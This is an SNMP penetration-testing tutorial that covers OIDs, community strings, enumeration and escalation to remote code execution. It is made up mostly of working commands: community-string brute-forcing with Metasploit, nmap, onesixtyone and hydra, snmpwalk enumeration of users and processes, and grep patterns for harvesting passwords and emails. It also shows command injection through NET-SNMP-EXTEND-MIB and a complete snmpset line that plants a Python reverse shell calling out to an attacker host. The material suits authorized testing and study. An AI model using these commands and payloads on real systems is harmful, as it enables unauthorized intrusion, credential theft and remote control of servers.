SNMP Pentesting Best Practicies

SNMP

SNMP usually uses ports 161,162

What is SNMP?

SNMP protocol is an application layer protocol defined by the Internet Architecture Board in RFC1157. SNMP is used to exchange management information between network devices. It is one of the most common protocols used for network management. SNMP is part of the Transmission Control Protocol/Internet Protocol (TCP/IP) suite as defined by the Internet Engineering Task Force.

Organizations use SNMP to monitor and manage devices on a local area network (LAN) or wide area network (WAN). Most network devices in the market come bundled with SNMP agents. If not, some devices also allow network admins to install the agents.

SNMP generally uses User Datagram Protocol (UDP) port number 161/162. An SNMP port is the SNMP communication endpoint. It is a logical construct that identifies SNMP data transfer. SNMP message transfer happens via UDP. The Transport Layer Security (TLS) or Datagram Transport Layer Security (DTLS) protocols are also used at times.

PORT    STATE SERVICE REASON                 VERSION
161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)

MIB

MIB stands for Management Information Base and is a collection of information organized hierarchically. These are accessed using a protocol such as SNMP. There are two types of MIBs: scalar and tabular. Scalar objects define a single object instance whereas tabular objects define multiple related object instances grouped in MIB tables.

OIDs

OIDs stands for Object Identifiers. OIDs uniquely identify managed objects in a MIB hierarchy. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations. Vendors define private branches including managed objects for their own products.

SNMP Pentesting

Shodan search query :
port:161,162

There are some well-known OIDs like the ones inside 1.3.6.1.2.1 that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the OIDs pending from this one you can obtain some interesting host data (system data, network data, processes data…)

OID Example

1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7

Here is a breakdown of this address.

• 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1”
• 3 – this is called ORG and it is used to specify the organization that built the device.
• 6 – this is the dod or the Department of Defense which is the organization that established the Internet first.
• 1 – this is the value of the internet to denote that all communications will happen through the Internet.
• 4 – this value determines that this device is made by a private organization and not a government one.
• 1 – this value denotes that the device is made by an enterprise or a business entity.

These first six values tend to be the same for all devices and they give you the basic information about them. This sequence of numbers will be the same for all OIDs, except when the device is made by the government.

Moving on to the next set of numbers.

• 1452 – gives the name of the organization that manufactured this device.
• 1 – explains the type of device. In this case, it is an alarm clock.
• 2 – determines that this device is a remote terminal unit.

The rest of the values give specific information about the device.

• 5 – denotes a discrete alarm point.
• 1 – specific point in the device
• 3 – port
• 21 – address of the port
• 1 – display for the port
• 4 – point number
• 7 – state of the point

(Example take from here)

SNMP Versions

There are 2 important versions of SNMP:

• SNMPv1: Main one, it is still the most frequent, the authentication is based on a string (community string) that travels in plain-text (all the information travels in plain text). Version 2 and 2c send the traffic in plain text also and uses a community string as authentication.
• SNMPv3: Uses a better authentication form and the information travels encrypted using (dictionary attack could be performed but would be much harder to find the correct creds that inn SNMPv1 and v2).

Community Strings

As mentioned before, in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.

The are 2 types of community strings:

• public mainly read only functions
• private Read/Write in general

Note that the writability of an OID depends on the community string used, so even if you find that “public” is being used, you could be able to write some values. Also, there may exist objects which are always “Read Only”. If you try to write an object a noSuchName or readOnly error is received. In versions 1 and 2/2c if you to use a bad community string the server wont respond. So, if it responds, a valid community strings was used.

Ports

• The SNMP agent receives requests on UDP port 161.
• The manager receives notifications (Traps and InformRequests) on port 162.
• When used with Transport Layer Security or Datagram Transport Layer Security, requests are received on port 10161 and notifications are sent to port 10162.

Brute-Force Community String (v1 and v2c)

To guess the community string you could perform a dictionary attack..

msf> use auxiliary/scanner/snmp/snmp_login # Metasploit
nmap -sU --script snmp-brute 192.168.x.x [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.x.x
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

Enumerating SNMP

# netcat banner grabbing
nc -nv 10.10.x.x 161

# banner grabbing with nmap
nmap -sU -p 161 -sV 10.10.x.x
nmap -vv -sV --version-intensity=5 -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 192.168.x.x

# Detection SNMP services in VLAN's
onesixtyone 10.10.x.x/24 public

Read info with snmpcheck

snmp-check 10.10.x.x -c public

Enumeration with snmpwalk

snmpwalk -v2c -c public 10.10.x.x
snmpwalk -v2c -c public 10.10.x.x 1.3.6.1.2.1.25.4.2.1.2

# You can talk SNMP with SNMP OID's

Windows RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2
Windows INSTALLED SOFTWARE  1.3.6.1.2.1.25.6.3.1.2
Windows SYSTEM INFO     1.3.6.1.2.1.1.1
Windows HOSTNAME        1.3.6.1.2.1.1.5
Windows DOMAIN          1.3.6.1.4.1.77.1.4.1
Windows UPTIME          1.3.6.1.2.1.1.3
Windows USERS           1.3.6.1.4.1.77.1.2.25
Windows SHARES          1.3.6.1.4.1.77.1.2.27
Windows DISKS           1.3.6.1.2.1.25.2.3.1.3
Windows SERVICES        1.3.6.1.4.1.77.1.2.3.1.1
Windows LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0
Windows LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0

Linux   RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2
Linux   SYSTEM INFO     1.3.6.1.2.1.1.1
Linux   HOSTNAME        1.3.6.1.2.1.1.5
Linux   UPTIME          1.3.6.1.2.1.1.3
Linux   MOUNTPOINTS     1.3.6.1.2.1.25.2.3.1.3
Linux   RUNNING SOFTWARE PATHS  1.3.6.1.2.1.25.4.2.1.4
Linux   LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0
Linux   LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0

Enumeration with snmpstatus

snmpstatus -v2c -c 'public' 10.10.x.x

It is recommanded to install the following to see whats does mean each OID gathered from the device:

apt-get install snmp-mibs-downloader
download-mibs

If you know a valid community string, you can access the data using SNMPWalk or SNMP-Check:

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap --script "snmp* and not snmp-brute" <target>

Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command :

snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull

SNMP has a lot of information about the host and things that you may find interesting are: Network interfaces (IPv4 and IPv6 address), Usernames, Uptime, Server/OS version, and processes running (may contain passwords).

From SNMP to RCE

If you have the string that allows you to write values inside the SNMP service, you may be able to abuse it to execute commands.

SNMP is sometimes overseen by the administrator of the device or server where it is left in a default configuration. SNMP community with write permissions (rwcommunity) on the Linux operating system can be abused to let the attacker execute a command on the server.

Extending the Services

While you are not able to modify existing entries that were configured in snmpd.conf, it is possible to add additional commands over SNMP, because the “MAX-ACCESS” permission setting in the MIB definition is set to “read-create”

Adding a new command basically works by appending an additional row to the “nsExtendObjects” table.

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

Injecting a command to run on the SNMP service. NET-SNMP-EXTEND-MIB requires that you always provide the absolute path to the executable. The called binary/script must also exist and be executable.

Executing the command that we injected to the SNMP by enumerating it using snmpwalk

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

Showing that the command is /bin/echo

The command will be executed when the it is read. run-on-read()

The command /bin/echo “hello rio is here” was executed during our snmpwalk read

Getting the Shell from Net-SNMP Extend

In this section, I would like to discuss how to gain a server shell to control the server.

You can use python script developed by mxrch that can be downloaded from https://github.com/mxrch/snmp-shell.git

You can install the pre-requisite to run this:

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

Creating reverse shell

You can also create reverse shell manually by injecting the command below into the SNMP

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

run the snmpwalk to trigger the command execution

Our netcat receives the reverseshell connection from the victim that allow us to gain control over the victim machine

Massive SNMP

Braa is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

braa ignite123@192.168.1.125:.1.3.6.*

This can extract a lot MB of information that you cannot process manually.

So, lets look for the most interesting information (from https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)

Devices

One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:

grep ".1.3.6.1.2.1.1.1.0" *.snmp

Identify private string

As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP Trap data. So again, using the following grep we can parse through a lot of MIB data quickly searching for the key word of “trap”:

grep -i "trap" *.snmp

Usernames/passwords

Another area of interest is logs, I have discovered that there are some devices that hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for key words such as fail, failed or login and examine that data to see if there is anything of value.

grep -i "login\|fail" *.snmp

Emails

grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp

Modifying SNMP values

You can use NetScanTools to modify values. You will need to know the private string in order to do so.

Spoofing

If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic.

Examine SNMP Configuration files

• snmp.conf
• snmpd.conf
• snmp-config.xml